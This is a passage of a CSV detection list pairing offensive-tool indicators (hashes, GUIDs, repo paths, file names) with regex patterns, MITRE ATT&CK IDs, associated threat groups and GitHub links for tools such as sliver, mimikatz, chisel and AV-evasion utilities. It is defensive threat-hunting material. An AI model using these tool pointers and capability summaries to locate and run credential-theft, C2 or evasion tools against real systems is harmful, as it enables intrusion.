"*1fc325f3-c548-43db-a13f-8c460dda8381*",".{0,1000}1fc325f3\-c548\-43db\-a13f\-8c460dda8381.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#GUIDproject","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","23002"
"*1fc722c8c40a50aaf248839f7da26ad37a11b67963cf37e94fefd262632ab6b2*",".{0,1000}1fc722c8c40a50aaf248839f7da26ad37a11b67963cf37e94fefd262632ab6b2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23003"
"*1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c*",".{0,1000}1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23004"
"*1fcdf70d9d7546a68df3ef27d3cb8eee7a125cb1a27de14ea8a2c3460275379d*",".{0,1000}1fcdf70d9d7546a68df3ef27d3cb8eee7a125cb1a27de14ea8a2c3460275379d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23005"
"*1fd102be57f9c6c0b3a6fee86877d6eff1744782a71661f57afea9a895b5db38*",".{0,1000}1fd102be57f9c6c0b3a6fee86877d6eff1744782a71661f57afea9a895b5db38.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23006"
"*1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0*",".{0,1000}1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23008"
"*1FDCAD33-E5D1-4D5F-ACD5-FA6F8661DFE5*",".{0,1000}1FDCAD33\-E5D1\-4D5F\-ACD5\-FA6F8661DFE5.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23010"
"*1fe92c614cbb39738a9726a5d970ac526f579b7e146c65ecd02cf6d4e7d563c1*",".{0,1000}1fe92c614cbb39738a9726a5d970ac526f579b7e146c65ecd02cf6d4e7d563c1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","23014"
"*1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9*",".{0,1000}1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23015"
"*1ff4136cc59aec4f76d776abce00a592679490763f669a44eeead8f88c4a3c07*",".{0,1000}1ff4136cc59aec4f76d776abce00a592679490763f669a44eeead8f88c4a3c07.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","23016"
"*1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595*",".{0,1000}1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23017"
"*1ff88fe10eddeecf2f6d8c4e3fabf55a30f6572fc8b4df4b8117ff89b774a234*",".{0,1000}1ff88fe10eddeecf2f6d8c4e3fabf55a30f6572fc8b4df4b8117ff89b774a234.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23019"
"*1ffbdfc67132f41d9dee443ebdb65b7cade592378cb846467c32f8984df4ab9b*",".{0,1000}1ffbdfc67132f41d9dee443ebdb65b7cade592378cb846467c32f8984df4ab9b.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","23020"
"*1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614*",".{0,1000}1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23021"
"*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*",".{0,1000}1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","23022"
"*1kdnwbry2LyI7pyA*",".{0,1000}1kdnwbry2LyI7pyA.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","23023"
"*1mil-AD-passwords.txt*",".{0,1000}1mil\-AD\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","23024"
"*1N3/Sn1per*",".{0,1000}1N3\/Sn1per.{0,1000}","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/1N3/Sn1per","1","0","N/A","N/A","N/A","10","8673","1917","2025-02-28T21:52:43Z","2015-09-06T15:47:38Z","23025"
"*1N73LL1G3NC3x/Nightmangle*",".{0,1000}1N73LL1G3NC3x\/Nightmangle.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","23026"
"*1njected/CMLoot*",".{0,1000}1njected\/CMLoot.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","23027"
"*1password2john.py*",".{0,1000}1password2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","23028"
"*1rapid7-1_amd64.deb*",".{0,1000}1rapid7\-1_amd64\.deb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","23029"
"*1y0n/AV_Evasion_Tool*",".{0,1000}1y0n\/AV_Evasion_Tool.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23030"
"*1y0n/AVKiller*",".{0,1000}1y0n\/AVKiller.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","23031"
"*2_lyncbrute.sh*",".{0,1000}2_lyncbrute\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","23032"
"*200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99*",".{0,1000}200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23034"
"*2010807d09f45f949a2e24615d58a15d8914e09f9988aa8fd7c863c7e5434aa8*",".{0,1000}2010807d09f45f949a2e24615d58a15d8914e09f9988aa8fd7c863c7e5434aa8.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","23035"
"*2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4*",".{0,1000}2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23037"
"*20144d177f7af4b900fddf4466327737bb72bf30c450a4e6a577f0efc6449647*",".{0,1000}20144d177f7af4b900fddf4466327737bb72bf30c450a4e6a577f0efc6449647.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","23038"
"*2015-2022 www.sordum.org All Rights Reserved*",".{0,1000}2015\-2022\swww\.sordum\.org\sAll\sRights\sReserved.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","23039"
"*2016147045d2cbb478945f57bff4c5ce7ae8921c5b5cc996c76df9165b93c9d4*",".{0,1000}2016147045d2cbb478945f57bff4c5ce7ae8921c5b5cc996c76df9165b93c9d4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23040"
"*20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650*",".{0,1000}20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23041"
"*2018bdc2964ffdea2e1e42f9bc8f5480b6203dac3bafc7eee958fb4d90d59139*",".{0,1000}2018bdc2964ffdea2e1e42f9bc8f5480b6203dac3bafc7eee958fb4d90d59139.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23042"
"*2020host2021@tutanota.com*",".{0,1000}2020host2021\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","23043"
"*2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64*",".{0,1000}2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23044"
"*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*",".{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","23045"
"*2037783e8898a2d75895b62f62e5c41c21fc8d63c8db0b31968964e8c3b10602*",".{0,1000}2037783e8898a2d75895b62f62e5c41c21fc8d63c8db0b31968964e8c3b10602.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23047"
"*203a17d5f5b9b71578a530294b19056d7fefa2660883c1389fce89d536e93950*",".{0,1000}203a17d5f5b9b71578a530294b19056d7fefa2660883c1389fce89d536e93950.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23048"
"*203e97f6f0cdd98944724e4899fbcd84ef5a84c85e1035ee303aaeb76756b95c*",".{0,1000}203e97f6f0cdd98944724e4899fbcd84ef5a84c85e1035ee303aaeb76756b95c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23049"
"*203f526ec99b89643cf5c7f59035791744cde64698f9d1f720670bc4dd327ebb*",".{0,1000}203f526ec99b89643cf5c7f59035791744cde64698f9d1f720670bc4dd327ebb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23050"
"*2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30*",".{0,1000}2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23051"
"*204d4653cfb248966be343b46d2ed6c063a3717edb3fb3eca68269654437e65d*",".{0,1000}204d4653cfb248966be343b46d2ed6c063a3717edb3fb3eca68269654437e65d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23053"
"*205557c0c8ffb366e94a954b35e848ea7e6ad72ed1f014e65a433288431f479c*",".{0,1000}205557c0c8ffb366e94a954b35e848ea7e6ad72ed1f014e65a433288431f479c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23055"
"*205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964*",".{0,1000}205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A","23057"
"*20584fdcd4c51f0eb1ce998ff5f19f2f897100549a008657148e7677722398c7*",".{0,1000}20584fdcd4c51f0eb1ce998ff5f19f2f897100549a008657148e7677722398c7.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23058"
"*2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7*",".{0,1000}2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23059"
"*205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602*",".{0,1000}205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23060"
"*205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602*",".{0,1000}205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23061"
